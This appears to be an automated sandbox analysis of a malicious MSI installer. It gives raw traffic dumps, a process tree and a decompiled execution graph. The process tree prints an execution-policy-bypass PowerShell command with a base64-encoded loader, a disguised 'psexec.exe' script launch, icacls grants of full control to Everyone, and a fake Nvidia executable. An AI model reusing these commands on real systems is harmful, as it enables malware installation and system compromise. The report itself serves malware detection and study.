                                                                        2024-12-20 14:43:21 UTC8000INData Raw: 8f 0f 22 e3 17 16 ac 4f 3a 24 d8 df 2e e2 c0 3a a6 5d 4e 74 4b 7b 56 9d 2a cb 66 a3 2b 7d ab 86 ca c7 8b ec c7 f9 13 0d d6 89 f3 fd 5f 51 1a df 68 0a 36 71 40 2d ba 9a 03 b5 3b 3e 43 f4 1b d4 28 6d 9a 45 4a 45 3e 15 f0 a2 77 ce 25 e7 ae 29 22 57 2f 48 76 df 4d 96 b0 8c ce 4d b6 4f da 48 71 6f 38 0a a5 d6 59 d7 22 05 9b 2e e4 13 21 cb 0b 31 22 f1 c6 ba 63 96 91 c9 e2 ac 89 23 ee 80 b9 bc 01 cc 49 d8 d9 af 96 32 b2 65 87 c6 cc 0f 08 19 84 cf ea 29 4b 48 6e b9 d8 01 33 ee b3 5f 59 45 a3 41 d1 4c b1 00 8b 68 74 f8 c9 98 b4 0b 19 80 5f 4a fd bc 8b 0d 9f d9 93 6f 22 52 65 85 34 6b 15 fd 74 c7 46 c6 1f 80 cf e1 da 11 8e 0e 80 1b 85 f8 f1 47 60 57 5b 27 42 e6 60 d7 84 77 be 87 bb 00 e0 1e 86 46 47 a8 42 b5 37 00 cd 64 0c 04 1e e7 4a 0a 3d 74 72 c8 16 b3 6a 77 76
                                                                        Data Ascii: "O:$.:]NtK{V*f+}_Qh6q@-;>C(mEJE>w%)"W/HvMMOHqo8Y".!1"c#I2e)KHn3_YEALht_Jo"Re4ktFG`W['B`wFGB7dJ=trjwv
                                                                        2024-12-20 14:43:21 UTC8000INData Raw: a2 be ad 20 ab c3 13 b4 e6 c4 15 2f f1 21 36 ea 5e 6f e5 ac 27 b7 99 f2 94 8a 06 9a 0e 0b 3c a7 56 c9 01 72 ea dc 53 6c 30 96 f0 f4 53 4c 6b 98 53 70 e2 dc bb 4c 57 2a 2c c3 aa e8 d2 4e 6e ff 24 cb a4 86 fa 2f 97 ec 30 0f 57 26 4c 59 63 c8 a6 32 e6 3f 28 eb 6c 07 52 3c 8c e1 85 b0 ee 10 93 15 a9 eb 46 ea 23 33 25 c0 48 9e 71 fa a8 85 6d 63 98 30 c9 8f 80 68 6a e3 90 57 8f 8e 8a b3 ab 91 1d 02 b9 e8 77 22 ec cf 6d 1f 3d cf 59 af a3 bd e2 cb bb bc 3d 04 7a f5 89 09 b1 1e 1d 17 e5 33 a8 5b 2d 63 0a 57 73 26 7d ec bf e1 1b e2 3b fa 0d ef 15 64 08 7f c1 20 84 be 79 0c 5c 04 51 27 b9 fb 59 15 93 1f ce 88 fc 8e e0 f9 06 63 b3 b2 44 e2 08 65 b8 37 c7 9c 27 85 44 23 30 32 88 c2 e3 78 30 d4 19 9d f3 6d 40 ab f4 8d b3 25 c6 a3 a3 e6 f7 2c d6 f1 90 b8 36 e8 e9 c0 fc
                                                                        Data Ascii: /!6^o'<VrSl0SLkSpLW*,Nn$/0W&LYc2?(lR<F#3%Hqmc0hjWw"m=Y=z3[-cWs&};d y\Q'YcDe7'D#02x0m@%,6
                                                                        2024-12-20 14:43:21 UTC8000INData Raw: 89 4f 13 99 db 4b fc 9a 22 3c 0f f3 f0 92 93 d6 fd a0 f1 85 80 34 66 4f 9d f0 08 b9 84 01 ca 4a c2 2f fd 50 25 b0 5d 34 8f 45 4f a3 a7 e1 6b 62 23 6b 4a 47 46 10 f1 73 b1 a7 89 6e cd c4 22 e6 74 09 be b1 21 43 1f ac 35 a8 83 7a e3 de b3 2c 1a 25 9c fc 7d 9f e6 46 d7 b6 39 56 8b a0 ca b3 26 fb e1 79 f1 dc 41 68 e1 69 10 67 ee 59 7a 5b 5e aa e6 fc e2 4f c3 cc 9f 9b 11 42 6b a2 39 a2 e3 f1 14 1a e6 1c 4d 74 4f 25 b5 dc 43 e4 46 9f 98 0d 0d d7 48 ea fc c5 5b 1a bf 22 c8 76 a0 ae 78 21 d8 51 d1 11 55 53 d4 6c 5f 40 73 e1 8d fc 43 24 06 b1 dd ae af 97 f6 3b a2 92 2d 6d 30 39 d1 6f c1 f0 53 8a b8 40 dd 90 7e 19 66 7d ea 97 cd 37 61 36 ed ae 2d 14 df be 18 66 a7 5d 88 e9 7c 2b 88 e2 31 50 68 d8 62 c1 a4 ac c3 78 13 de ab 29 c3 27 44 27 d6 27 63 9d 3c 8a 54 1b e4
                                                                        Data Ascii: OK"<4fOJ/P%]4EOkb#kJGFsn"t!C5z,%}F9V&yAhigYz[^OBk9MtO%CFH["vx!QUSl_@sC$;-m09oS@~f}7a6-f]|+1Phbx)'D''c<T
                                                                        2024-12-20 14:43:22 UTC8000INData Raw: eb 1a 75 9d 53 9a d6 2b 9d 1c d4 bf b7 8a ab 43 43 1f b1 0b cb 61 e9 c5 be 7a 18 1d c9 cd 3f 07 b0 b1 9e 8e 98 62 93 6f fd 0c 1e fc 98 e1 f2 75 f7 4a 25 e2 f9 ee 2e 95 82 01 2c b4 4b 9c 57 74 19 f2 1b 59 a3 a1 3a 7d 2c 76 f0 9f 96 f4 da 8f b0 cc dd 35 69 fe 2a 31 0c 75 37 7e 9b 5f 94 27 7b 31 7a 30 44 83 18 d9 9d aa 33 aa ec ca c2 27 b5 c2 22 7f 55 87 f7 c2 de ba 18 7d e6 95 f4 60 12 ac fc f6 99 75 52 1d 42 72 f8 2d fe 83 d5 a3 e7 93 33 cc 84 a8 fb cc 2f 32 57 28 5f be 5e 12 a6 38 6a 74 37 ac 1e 87 4f 0f f1 69 9c bd b3 4c 5a 1b c0 d6 38 fe 19 6c 4c 41 29 b2 5a d9 50 6e 4d f1 c8 b3 b4 b1 62 0c ef b9 ff 8b e7 93 d9 06 af 5f 6e f3 61 2c 5f a0 f0 30 25 48 5a f8 6f d2 6b 24 7c cf 6c 5d b0 53 f9 85 76 38 b9 7a 3d 92 4b 51 f1 7a bf 40 37 48 0e 13 cb a2 39 31 38
                                                                        Data Ascii: uS+CCaz?bouJ%.,KWtY:},v5i*1u7~_'{1z0D3'"U}`uRBr-3/2W(_^8jt7OiLZ8lLA)ZPnMb_na,_0%HZok$|l]Sv8z=KQz@7H918
                                                                        2024-12-20 14:43:22 UTC8000INData Raw: df ca 3e 3a 2c be 88 3e db 78 56 c1 4f ec a9 f3 bd 31 cd bc 20 2c 7d ec 8b 75 11 d9 b4 e0 f6 c8 d9 0b 8d ec c9 e7 b6 8f b7 39 71 fc 90 0f 49 3c 49 0c 3e 1b 38 09 12 b1 f4 a6 e2 80 31 47 bd aa ec f7 a2 91 18 e5 2d ce 52 86 df b6 31 53 72 91 a2 6b 2a 9b b0 ac 7a 83 95 9d e2 7a 6e 20 4f 2b 93 01 88 4e 87 97 ad 8e c3 07 8e aa 82 7a d6 14 dc d4 f0 78 d7 2e ca 0b 41 03 cb 23 0f 84 7b 81 f5 31 42 3a f1 bc 3e 29 af 40 fc 0c fc 14 c7 dd 46 12 fe 6d ac c3 bc 15 45 f1 72 61 f6 ed 0b f9 d1 e2 c0 78 09 5a c2 7e 63 3c 33 db 5e 92 27 ba f3 3e a2 2a e8 05 d9 50 c8 c7 ab 6a 3f 96 ce 0f fa c7 d5 71 b4 88 e4 f7 2b 3c a9 22 fb 6b 96 25 a5 bc 15 a2 85 74 1f 3f 9b 0d 7d 68 f8 dc e9 df d7 4b 2e 76 ab c8 02 a1 d3 d9 dd 8a 37 49 26 07 7e 14 37 89 8e 7d f9 9c 43 66 01 17 b6 3b f4
                                                                        Data Ascii: >:,>xVO1 ,}u9qI<I>81G-R1Srk*zzn O+Nzx.A#{1B:>)@FmEraxZ~c<3^'>*Pj?q+<"k%t?}hK.v7I&~7}Cf;
                                                                        2024-12-20 14:43:22 UTC8000INData Raw: 04 d2 70 92 61 da 7e f3 25 8c 8f c6 b4 47 86 1e 05 ad e7 fe 29 3c 14 12 88 de 6c 73 ef 07 ab 64 73 05 4c 7d 2c e8 51 05 66 61 3f b2 bd 80 43 41 e6 2f 55 21 31 9c 1c 15 18 26 19 11 ab 45 fe 41 66 d2 d6 e6 e8 dc a4 22 06 6e 6f 74 59 d1 8f c6 76 1c 65 d3 6d 25 6d f5 5e b8 ca eb 4b 1c 2c 13 3f a5 2a 0b b7 7d 7d 08 0a 0b 37 45 fc b1 95 83 f6 fb ac b5 9f 9b fe 16 8c c1 a2 78 be 16 c5 5c e5 83 c2 49 0f cc b0 9d bf 91 ef af 70 13 e3 50 1a d1 e0 33 ae 12 77 5b de a0 1a 51 4a 33 68 7b fe 7b ff a3 f6 85 1a 17 35 61 17 40 b1 3a 59 f9 e2 84 89 8b 76 2c d3 33 ae 52 ce ff 3b de 5b bc b7 be f7 79 12 ec 2d 96 12 75 b9 bd 1e 2d d1 02 6c 34 12 ec 63 83 41 55 41 45 4d 5f 2a b6 39 04 c1 18 3d a1 6e 7e 01 50 c8 e0 8a 1b 0b fe ea 3f 8f 1f 7f 7d 69 5e 9f 50 e8 dc 14 65 29 b3 8b
                                                                        Data Ascii: pa~%G)<lsdsL},Qfa?CA/U!1&EAf"notYvem%m^K,?*}}7Ex\IpP3w[QJ3h{{5a@:Yv,3R;[y-u-l4cAUAEM_*9=n~P?}i^Pe)
                                                                        2024-12-20 14:43:22 UTC8000INData Raw: c4 fc 5b 13 e3 6b e6 b6 4b 89 29 5c b7 91 8f 87 b7 63 e3 95 46 ec 14 b2 6f 4a 03 24 ea e8 5e 09 1f 0c 8e 3b d6 e2 e0 1a 88 6b aa 79 32 e0 67 6d 91 ad 8a ce 5e 51 a7 2b e1 22 a1 63 77 68 d8 67 a2 b2 2b a7 8f 7b 07 fd 4d 59 77 95 3b 5d fe 54 91 21 a3 7d 53 34 f2 db d2 04 4b e4 72 cd f0 87 36 a1 20 81 c5 f7 eb c1 6f dc 9f 0e 49 66 24 c2 0e 97 17 d2 22 c9 a9 b8 cd 84 da e9 94 74 16 31 35 42 66 68 9e 37 e8 94 f4 ee 8b 4f ef 43 7b 62 fe bc 16 b5 c8 62 c5 0e 81 84 b2 ce 39 00 b1 4a ba 4c 3c 15 db 4e 5b a7 d6 0d db d1 97 6e ee 1b 28 4f 32 09 34 88 32 06 4c d4 51 e3 6e 9d c7 b3 0e d2 99 71 ba 63 c9 fe 3c e5 d2 80 d6 25 ac 27 d8 ba 52 f1 c0 7e 17 97 b9 8e c4 a7 a0 56 97 60 74 c2 e2 87 5f 3e fa 22 44 57 64 8a e2 4a d2 95 fc 1b 6a 48 f4 6b 5e e9 6a e7 86 ca 46 96 33
                                                                        Data Ascii: [kK)\cFoJ$^;ky2gm^Q+"cwhg+{MYw;]T!}S4Kr6 oIf$"t15Bfh7OC{bb9JL<N[n(O242LQnqc<%'R~V`t_>"DWdJjHk^jF3
                                                                        2024-12-20 14:43:22 UTC8000INData Raw: 17 f5 71 1d ce 08 90 f2 39 5d f1 5d fe b5 36 b3 62 10 34 e5 42 6d aa 19 ab 81 04 e9 1a f7 e9 85 55 7a aa da af 11 bb 2c b7 8a c4 85 21 db b4 cc 38 e4 e7 52 d5 a3 85 7c e1 b7 6a a9 ba 7b e5 b2 ac bb e7 4d 94 b0 6e 23 61 6e 23 9a 2e c3 6d 45 62 ab 1b 33 1b fb 5b b3 18 d3 dd 64 df a5 5e 67 3e 13 9a ef 22 56 ab 20 e5 55 6b 1d a4 a0 f9 3b a9 fb 1f 56 d0 0a 48 28 2c 38 65 42 57 4a d9 9a 56 d8 a2 ce 1a 4b a0 b7 6a 8c cb f8 9f 9f 5a 0d 38 b0 fa b8 31 b6 1c 8f d8 dd d1 7b 20 70 ab 9f 1f 3c 58 8d 0c 4c 93 7e 3f 91 cf dd b1 82 7a 9b 44 ad 71 72 81 4b 07 fa ec d5 f3 0e e8 ef 72 c3 83 a5 1e 9e a3 b4 fd 22 45 82 6e d4 85 ee 04 f6 97 11 7f 1a 5f 2e 58 ab 09 e0 93 a1 07 a9 a7 d5 c5 8c eb cc 37 44 ca 63 3a 3a 90 88 a6 9e 84 58 9a 28 12 e6 26 3e 79 4c 4e a7 c7 12 cf c2 09
                                                                        Data Ascii: q9]]6b4BmUz,!8R|j{Mn#an#.mEb3[d^g>"V Uk;VH(,8eBWJVKjZ81{ p<XL~?zDqrKr"En_.X7Dc::X(&>yLN


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:09:43:03
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\cB1ItKbbhY.msi"
                                                                        Imagebase:0x7ff6e3e20000
                                                                        File size:69'632 bytes
                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:2
                                                                        Start time:09:43:03
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                        Imagebase:0x7ff6e3e20000
                                                                        File size:69'632 bytes
                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:3
                                                                        Start time:09:43:04
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E94365CFD725BFADC9A5695E48A7145F
                                                                        Imagebase:0xdc0000
                                                                        File size:59'904 bytes
                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:4
                                                                        Start time:09:43:05
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\Installer\MSI2EE6.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Installer\MSI2EE6.tmp" /HideWindow "C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"
                                                                        Imagebase:0xad0000
                                                                        File size:416'256 bytes
                                                                        MD5 hash:D2F8C062ABA50CA096CBD5387A2D0B8B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:5
                                                                        Start time:09:43:05
                                                                        Start date:20/12/2024
                                                                        Path:C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe" "C:\Program Files (x86)\Dasmei support\App Dasmei installer\1e.ps1"
                                                                        Imagebase:0x250000
                                                                        File size:133'536 bytes
                                                                        MD5 hash:79AB86017B2C9B713D6AF08086B1937F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 26%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:6
                                                                        Start time:09:43:06
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAzADEAOQAzADIANgBiADYALQBjADQANgBiAC0ANAA1ADAANwAtADgANABkADIALQA5ADgAMgAzADUAOQAzAGUAMgA1AGYANAAnADsAJAB5AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACAAKAB4ADgANgApAFwARABhAHMAbQBlAGkAIABzAHUAcABwAG8AcgB0AFwAQQBwAHAAIABEAGEAcwBtAGUAaQAgACAAaQBuAHMAdABhAGwAbABlAHIAXABwAHMAZQB4AGUAYwAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:7
                                                                        Start time:09:43:06
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:09:43:08
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\icacls.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-59226 /grant Everyone:F /T /C
                                                                        Imagebase:0x7ff6bd3c0000
                                                                        File size:39'424 bytes
                                                                        MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:09:43:09
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        Imagebase:0x7ff717f30000
                                                                        File size:496'640 bytes
                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:09:43:12
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff7403e0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:09:43:38
                                                                        Start date:20/12/2024
                                                                        Path:C:\Windows\System32\icacls.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\icacls.exe" C:\Nvidia-59226\Nvidia-59226.exe /grant Everyone:F /T /C
                                                                        Imagebase:0x7ff6bd3c0000
                                                                        File size:39'424 bytes
                                                                        MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:09:43:38
                                                                        Start date:20/12/2024
                                                                        Path:C:\Nvidia-59226\Nvidia-59226.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Nvidia-59226\Nvidia-59226.exe"
                                                                        Imagebase:0x520000
                                                                        File size:8'816'544 bytes
                                                                        MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Borland Delphi
                                                                        Has exited:false

                                                                        Target ID:18
                                                                        Start time:09:43:50
                                                                        Start date:20/12/2024
                                                                        Path:C:\Nvidia-59226\Nvidia-59226.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Nvidia-59226\Nvidia-59226.exe"
                                                                        Imagebase:0x520000
                                                                        File size:8'816'544 bytes
                                                                        MD5 hash:D11828146FF9E2E340C555F9531CAC47
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:Borland Delphi
                                                                        Has exited:true

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:1.3%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:13.4%
                                                                          Total number of Nodes:336
                                                                          Total number of Limit Nodes:12
                                                                          execution_graph 34971 af9ba2 34972 af9bae __FrameHandler3::FrameUnwindToState 34971->34972 34997 af96f2 34972->34997 34974 af9bb5 34975 af9d08 34974->34975 34985 af9bdf ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 34974->34985 35043 afa111 4 API calls 2 library calls 34975->35043 34977 af9d0f 35044 b09ef2 23 API calls std::locale::_Setgloballocale 34977->35044 34979 af9d15 35045 b09eb6 23 API calls std::locale::_Setgloballocale 34979->35045 34981 af9d1d 34982 af9bfe 34983 af9c7f 35008 afa226 34983->35008 34985->34982 34985->34983 35042 b09ecc 41 API calls 3 library calls 34985->35042 34986 af9c85 35012 ae1fe0 GetCommandLineW 34986->35012 34998 af96fb 34997->34998 35046 af9d5c IsProcessorFeaturePresent 34998->35046 35000 af9707 35047 afcbc9 10 API calls 2 library calls 35000->35047 35002 af970c 35007 af9710 35002->35007 35048 b0a975 35002->35048 35005 af9727 35005->34974 35007->34974 35107 afadc0 35008->35107 35010 afa239 GetStartupInfoW 35011 afa24c 35010->35011 35011->34986 35013 ae2020 35012->35013 35108 ad4f60 LocalAlloc 35013->35108 35015 ae2031 35109 ad8de0 35015->35109 35017 ae2089 35018 ae209d 35017->35018 35019 ae208d 35017->35019 35117 ae1130 LocalAlloc LocalAlloc 35018->35117 35165 ad89d0 81 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 35019->35165 35022 ae2096 35024 ae21e6 ExitProcess 35022->35024 35023 ae20a9 35118 ae1450 35023->35118 35030 ae20eb 35136 adae80 35030->35136 35032 ae2174 35037 ae21c8 35032->35037 35142 ad9060 35032->35142 35033 ae2142 35033->35032 35034 ad2af0 42 API calls 35033->35034 35034->35032 35036 ae21af 35036->35037 35166 ae19b0 CreateFileW SetFilePointer WriteFile CloseHandle 35036->35166 35167 ad40e0 42 API calls 35037->35167 35040 ae21d7 35168 ae21f0 LocalFree LocalFree 35040->35168 35042->34983 35043->34977 35044->34979 35045->34981 35046->35000 35047->35002 35052 b11b0a 35048->35052 35051 afcbe8 7 API calls 2 library calls 35051->35007 35053 b11b1a 35052->35053 35054 af9719 35052->35054 35053->35054 35056 b0dcf0 35053->35056 35054->35005 35054->35051 35057 b0dcfc __FrameHandler3::FrameUnwindToState 35056->35057 35068 b08c61 EnterCriticalSection 35057->35068 35059 b0dd03 35069 b12078 35059->35069 35062 b0dd21 35084 b0dd47 LeaveCriticalSection std::_Lockit::~_Lockit 35062->35084 35065 b0dd1c 35083 b0dc3f GetStdHandle GetFileType 35065->35083 35066 b0dd32 35066->35053 35068->35059 35070 b12084 __FrameHandler3::FrameUnwindToState 35069->35070 35071 b1208d 35070->35071 35072 b120ae 35070->35072 35093 afe440 14 API calls __dosmaperr 35071->35093 35085 b08c61 EnterCriticalSection 35072->35085 35075 b12092 35094 afe342 41 API calls __cftoe 35075->35094 35077 b0dd12 35077->35062 35082 b0db89 44 API calls 35077->35082 35078 b120e6 35095 b1210d LeaveCriticalSection std::_Lockit::~_Lockit 35078->35095 35079 b120ba 35079->35078 35086 b11fc8 35079->35086 35082->35065 35083->35062 35084->35066 35085->35079 35096 b0e125 35086->35096 35088 b11fe7 35104 b0c3f8 14 API calls 2 library calls 35088->35104 35090 b11fda 35090->35088 35103 b0e7da 6 API calls std::_Locinfo::_Locinfo_ctor 35090->35103 35091 b1203c 35091->35079 35093->35075 35094->35077 35095->35077 35101 b0e132 __cftoe 35096->35101 35097 b0e172 35106 afe440 14 API calls __dosmaperr 35097->35106 35098 b0e15d RtlAllocateHeap 35100 b0e170 35098->35100 35098->35101 35100->35090 35101->35097 35101->35098 35105 b11bb2 EnterCriticalSection LeaveCriticalSection __cftoe 35101->35105 35103->35090 35104->35091 35105->35101 35106->35100 35107->35010 35108->35015 35111 ad8e32 35109->35111 35110 ad8e74 35112 af9557 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35110->35112 35111->35110 35114 ad8e62 35111->35114 35113 ad8e82 35112->35113 35113->35017 35169 af9557 35114->35169 35116 ad8e70 35116->35017 35117->35023 35119 ae1802 35118->35119 35120 ae1464 35118->35120 35125 ad2af0 35119->35125 35120->35119 35121 ae1860 35120->35121 35177 ad8620 9 API calls 35121->35177 35123 ae186a RegOpenKeyExW 35123->35119 35124 ae1885 RegQueryValueExW 35123->35124 35124->35119 35126 ad2b11 35125->35126 35126->35126 35178 ad3b90 35126->35178 35128 ad2b29 35129 ad9380 35128->35129 35186 ad2b30 35129->35186 35131 ad93c6 35204 ad9b40 35131->35204 35137 adae8d 35136->35137 35138 adae8a 35136->35138 35139 adae9a ___vcrt_FlsFree 35137->35139 35252 b02cae 42 API calls 2 library calls 35137->35252 35138->35033 35139->35033 35141 adaead 35141->35033 35143 ad90a9 35142->35143 35144 ad9094 35142->35144 35253 ad6060 GetCurrentProcess OpenProcessToken 35143->35253 35144->35036 35146 ad90bc 35147 ad9196 35146->35147 35149 ad90d6 35146->35149 35258 ad1fe0 61 API calls 35147->35258 35311 ad1fe0 61 API calls 35149->35311 35150 ad91bd 35259 ad1fe0 61 API calls 35150->35259 35153 ad90ea 35312 ad1fe0 61 API calls 35153->35312 35154 ad91d2 35260 ad1fe0 61 API calls 35154->35260 35157 ad9107 35313 ad1fe0 61 API calls 35157->35313 35158 ad91e3 35261 ad7800 35158->35261 35161 ad9115 35314 ad6fe0 154 API calls 2 library calls 35161->35314 35163 ad91fc 35163->35036 35164 ad912d 35164->35163 35165->35022 35166->35037 35167->35040 35168->35024 35170 af955f 35169->35170 35171 af9560 IsProcessorFeaturePresent 35169->35171 35170->35116 35173 af990a 35171->35173 35176 af98cd SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35173->35176 35175 af99ed 35175->35116 35176->35175 35177->35123 35179 ad3c65 35178->35179 35182 ad3ba4 __Strxfrm 35178->35182 35185 ad3700 42 API calls 35179->35185 35182->35128 35187 ad2b56 35186->35187 35188 ad2c17 35187->35188 35189 ad2b6b 35187->35189 35191 ad2b92 35187->35191 35194 ad2c12 35187->35194 35196 ad2bdc 35187->35196 35242 ad3700 42 API calls 35188->35242 35189->35131 35191->35194 35197 ad2bc4 LocalAlloc 35191->35197 35192 ad2c1c 35243 afe352 41 API calls 2 library calls 35192->35243 35241 ad3b70 RaiseException Concurrency::cancel_current_task 35194->35241 35199 ad2be0 LocalAlloc 35196->35199 35202 ad2bed __Strxfrm 35196->35202 35197->35192 35198 ad2bd1 35197->35198 35198->35202 35199->35202 35202->35131 35205 ad9b9a ___vcrt_FlsFree 35204->35205 35211 ad9d02 ___vcrt_FlsFree 35204->35211 35208 ad9bc5 35205->35208 35205->35211 35206 af9557 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35207 